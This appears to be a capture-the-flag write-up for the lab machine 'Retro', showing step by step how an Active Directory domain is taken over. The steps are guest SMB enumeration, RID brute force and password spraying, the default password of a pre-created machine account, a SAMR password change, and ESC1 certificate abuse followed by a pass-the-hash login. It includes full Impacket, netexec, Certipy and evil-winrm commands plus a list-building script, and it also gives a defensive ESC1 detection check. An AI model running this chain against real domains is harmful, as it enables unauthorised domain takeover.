# Retro - Writeup (VulnLab & HackTheBox)

```bash
██████╗░███████╗████████╗██████╗░░█████╗░
██╔══██╗██╔════╝╚══██╔══╝██╔══██╗██╔══██╗
██████╔╝█████╗░░░░░██║░░░██████╔╝██║░░██║
██╔══██╗██╔══╝░░░░░██║░░░██╔══██╗██║░░██║
██║░░██║███████╗░░░██║░░░██║░░██║╚█████╔╝
╚═╝░░╚═╝╚══════╝░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░

-----------------------------------------
Easy box: an SMB null session as guest for the initial foothold,
RID brute force to enumerate accounts, a pre-created machine account
still carrying its default password, a password change over SAMR,
and ESC1 abuse through ADCS to escalate to Domain Admin.
```

# **❄️ NMAP & INFO**

```bash
53     → domain (Simple DNS Plus)  
88     → kerberos-sec (Microsoft Windows Kerberos)  
135    → msrpc (Microsoft Windows RPC)  
139    → netbios-ssn (Microsoft Windows netbios-ssn)  
389    → ldap (Microsoft Windows Active Directory LDAP)  
445    → microsoft-ds?  
464    → kpasswd5?  
593    → ncacn_http (Microsoft Windows RPC over HTTP 1.0)  
636    → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3268   → ldap (Microsoft Windows Active Directory LDAP)  
3269   → ssl/ldap (Microsoft Windows Active Directory LDAP)  
3389   → ms-wbt-server (Microsoft Terminal Services)  
```

# **❄️ FOOTHOLD**

Since we don’t have any credentials yet, I started by bruteforcing Kerberos usernames using **kerbrute**, which revealed two valid accounts:

* `guest@retro.vl`
    
* `administrator@retro.vl`
    

An attempt at an RPC null session didn’t give me anything useful. So instead, I tried an SMB null session, this time assuming the `guest` account might allow anonymous access.

Listing the shares as `guest` works, and the **Trainees** share stands out because we have Read permission on it:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754028857503/a5347765-c59f-418d-9602-95c09c1d231f.png align="center")

## **SMB | Null Session**

Using Impacket's **smbclient.py**:

```bash
smbclient.py DC.retro.vl/guest:''@10.129.172.145
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754028878406/89c25b7a-04c9-4c3c-8b71-05baee823451.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754028881420/ca462c56-09d2-4969-b0ae-2a9ddae603c0.png align="center")

After reading the note in that share, I enumerated domain accounts by RID brute-forcing with netexec (the `guest` null session is enough for this):

```bash
nxc smb 10.129.172.145 -u guest -p '' --rid-brute
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029021751/1aead939-8ed6-4cdb-a7a5-6bdca98ac6a9.png align="center")

I put the user names it returned into a wordlist and ran a password-guessing attack against them, which turned up a working password for `trainee`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029028293/bf21510e-fe28-4cdc-ac8f-9117cb2fca98.png align="center")

## **SMB | Trainee | flag.txt**

Enumerating the shares again with the new credentials shows an additional share called **Notes**, on which we have read permission. Connecting to it over SMB reveals two files:

* `user.txt` (the user flag)

* `ToDo.txt`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029059769/05414190-8559-40ab-ad3b-17634c266e13.png align="center")

## **Bloodhound Time**

After reading the **ToDo.txt** file, I ran **bloodhound-python** to collect the AD objects and their relationships so I could inspect them in BloodHound:


```bash
bloodhound-python -u 'trainee' -p '<REDACTED>' -ns 10.129.172.145 -d 'retro.vl' -c all --dns-tcp --zip
```

Based on the hint mentioning an old pre-created machine account, I found a computer object named `BANKING.RETRO.VL`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029086058/0c542cf9-b97e-4188-99fc-d91d19799e98.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029089886/1d2d8aa1-898e-4ff4-8f9f-a31b213b3d1a.png align="center")

The logon name of a computer object is the computer name with a trailing `$`, so the account to target is `BANKING$`. A computer account created in advance with the "pre-Windows 2000 computer" option gets the lowercase computer name (`banking`) as its password, so I tried that along with a few other common guesses:

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029103582/5d91702a-74e1-4aa7-898d-36228e9a069e.png align="center")

As [that post](https://medium.com/@offsecdeer/finding-weak-ad-computer-passwords-e3dc1ed220df) explains, `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT` is not a failed guess. The password was accepted; the DC only refuses this NTLM logon type for a computer account that has never completed a domain join, which is exactly the state of a pre-created account still carrying its default password. So `banking` is correct, but NTLM logons as `BANKING$` stay blocked until the password is changed. A computer account that knows its current password is allowed to change it, which is the next step.
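The two list-building steps above (turning the `--rid-brute` output into wordlists, and deriving the default password of each pre-created computer account) as one added shell example; this is not part of the original writeup and not netexec's own code. It parses the `nxc --rid-brute` line format into user and computer accounts, drops groups, and for every computer account emits the pre-Windows 2000 default guess: the lowercase computer name without `$`, truncated to 14 characters. The `nxc` lines are a constructed sample with made-up RIDs; `DC$`, `trainee` and `BANKING$` are the names seen on the box, the rest are assumptions. Only the commented `nxc` spray at the end needs the DC.

```bash
#!/bin/sh
# Constructed sample of `nxc smb <ip> -u guest -p '' --rid-brute` output.
# RIDs are illustrative, not the box's real output.
SAMPLE_RID_OUTPUT='SMB  10.129.172.145  445  DC  500: RETRO\Administrator (SidTypeUser)
SMB  10.129.172.145  445  DC  501: RETRO\Guest (SidTypeUser)
SMB  10.129.172.145  445  DC  512: RETRO\Domain Admins (SidTypeGroup)
SMB  10.129.172.145  445  DC  513: RETRO\Domain Users (SidTypeGroup)
SMB  10.129.172.145  445  DC  1000: RETRO\DC$ (SidTypeUser)
SMB  10.129.172.145  445  DC  1103: RETRO\trainee (SidTypeUser)
SMB  10.129.172.145  445  DC  1104: RETRO\BANKING$ (SidTypeUser)'

# Keep only SidTypeUser rows and strip the DOMAIN\ prefix. Groups and
# aliases are dropped: they are not logon accounts and only add noise.
rid_users() {
  sed -n 's/.*: [^\\]*\\\(.*\) (SidTypeUser)$/\1/p'
}

# Computer accounts end in "$". Keep them apart: spraying user passwords
# at them is wasted effort, and they get a dedicated guess below.
machine_accounts() { grep '\$$'; }
user_accounts()    { grep -v '\$$'; }

# Default password of a computer account created with the "pre-Windows 2000
# computer" option: lowercase computer name without "$", first 14 characters.
precreated_default_pw() {
  printf '%s\n' "$1" | sed 's/\$$//' | tr 'A-Z' 'a-z' | cut -c1-14
}

# Emit one "account:password" guess per machine account on stdin.
machine_guesses() {
  while IFS= read -r acct; do
    printf '%s:%s\n' "$acct" "$(precreated_default_pw "$acct")"
  done
}

# Demo on the constructed sample: first the spray list, then the machine guesses.
printf '%s\n' "$SAMPLE_RID_OUTPUT" | rid_users | user_accounts
printf '%s\n' "$SAMPLE_RID_OUTPUT" | rid_users | machine_accounts | machine_guesses

# Against the real DC you would save the lists and spray, e.g.:
#   nxc smb 10.129.172.145 --rid-brute -u guest -p '' | rid_users | user_accounts > users.txt
#   nxc smb 10.129.172.145 -u users.txt -p '<password>' --continue-on-success
```

The machine guesses are meant for one attempt each, not a spray: a computer account that answers `STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT` to its default password is a hit, as the section above explains, and repeated wrong guesses against computer accounts lock them out like any other account.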

By running:

```bash
changepasswd.py retro.vl/'BANKING$':banking@10.129.172.145 -newpass '<REDACTED>' -dc-ip 10.129.172.145 -p rpc-samr
```

That changed the machine account's password. Impacket's **changepasswd.py** can change a password over LDAP, kpasswd, SMB (`smb-samr`) or plain RPC (`rpc-samr`). Both of the last two speak SAMR, but `smb-samr` first needs an SMB session on `IPC$`, which is exactly the NTLM logon the DC rejected above, so `rpc-samr`, which reaches SAMR directly over MS-RPC without an SMB session setup, is the one that works with the default password. On a real engagement this is a state-changing action: note the old and new values, because a host that later tries to join with that name will fail until it is reverted.

## **ADCS | PrivEsc**

With the `BANKING$` password changed and BloodHound reviewed again, I enumerated with netexec to check whether **ADCS** is present and whether any of its templates can be abused.

The result confirms there’s a **PKI Enrollment Server** at `DC.retro.vl`, and the Certificate Authority is `retro-DC-CA`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029130732/90e0bbd7-c899-4e75-a43e-ab8aee3d2dde.png align="center")

## **ADCS | Finding Vulnerable Certificates**

I then ran Certipy as `BANKING$` to look for templates it can enroll in that are misconfigured. The `-u` value is `user@domain`, and the account name has to be quoted: an unquoted `BANKING$@retro.vl` would have `$@` expanded by the shell.

```bash
certipy find -vulnerable -u 'BANKING$@retro.vl' -p '<REDACTED>' -target 10.129.172.145 -dc-ip 10.129.172.145 -stdout
```

## **ESC1 Abuse**

Certipy reports the **RetroClients** template as vulnerable to ESC1. ESC1 is the combination of a template that lets the enrollee supply the subject alternative name, carries an EKU usable for client authentication, and is enrollable by a low-privileged principal, here the computer account we control. That lets us request a certificate for any UPN we like, so I ask for one as the domain administrator:

```bash
certipy req -u 'BANKING$'@retro.vl -p '<REDACTED>' -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -dc-ip 10.129.172.145 -target-ip 10.129.172.145 -key-size 4096
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1754029155816/79896334-a146-4bfa-b83d-4ddc7769e852.png align="center")
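A defender-side check for the request above, as an added shell example that is not the writeup's own tooling: given an export of issued certificates with the requester and the SAN UPN per row, it flags every certificate whose UPN names a different account than the one that requested it, which is what an ESC1 enrollment looks like from the CA's side. The CSV and its four column names are constructed for the example; a real export (for instance of the CA database via `certutil -view`) needs its columns mapped onto these four first.

```bash
#!/bin/sh
# Constructed sample of an issued-certificate export. The column layout
# (RequestID,RequesterName,CertificateTemplate,SAN_UPN) is hypothetical.
SAMPLE_ISSUED='RequestID,RequesterName,CertificateTemplate,SAN_UPN
41,RETRO\trainee,User,trainee@retro.vl
42,RETRO\DC$,Machine,
43,RETRO\BANKING$,RetroClients,administrator@retro.vl
44,RETRO\trainee,RetroClients,trainee@retro.vl'

# Print one line per certificate whose SAN UPN names a different account
# than the requester. Rows without a UPN (e.g. machine certificates that
# only carry a DNS name) are ignored; the header row is skipped.
esc1_suspects() {
  awk -F, 'NR > 1 {
      req = tolower($2); sub(/^.*\\/, "", req)     # RETRO\BANKING$ -> banking$
      upn = tolower($4); sub(/@.*$/, "", upn)       # administrator@retro.vl -> administrator
      if (upn != "" && upn != req)
          printf "request %s: %s enrolled %s as %s\n", $1, $2, $3, $4
  }'
}

# Demo on the constructed sample: only request 43 should be reported.
printf '%s\n' "$SAMPLE_ISSUED" | esc1_suspects
```

A mismatch is not proof of abuse on its own (enrollment agents and some provisioning flows legitimately request on behalf of others), but a computer account obtaining a certificate for a domain admin UPN, as in request 43, has no benign explanation and is the row to act on.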

With the PFX that Certipy saved, I run `certipy auth` against the DC: it authenticates with the certificate through PKINIT and prints the Administrator NT hash, which is enough for a pass-the-hash login through **evil-winrm**:

```bash
evil-winrm -i 10.129.172.145 -u Administrator -H '<HASH>'

*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
```

> **Pwned!**
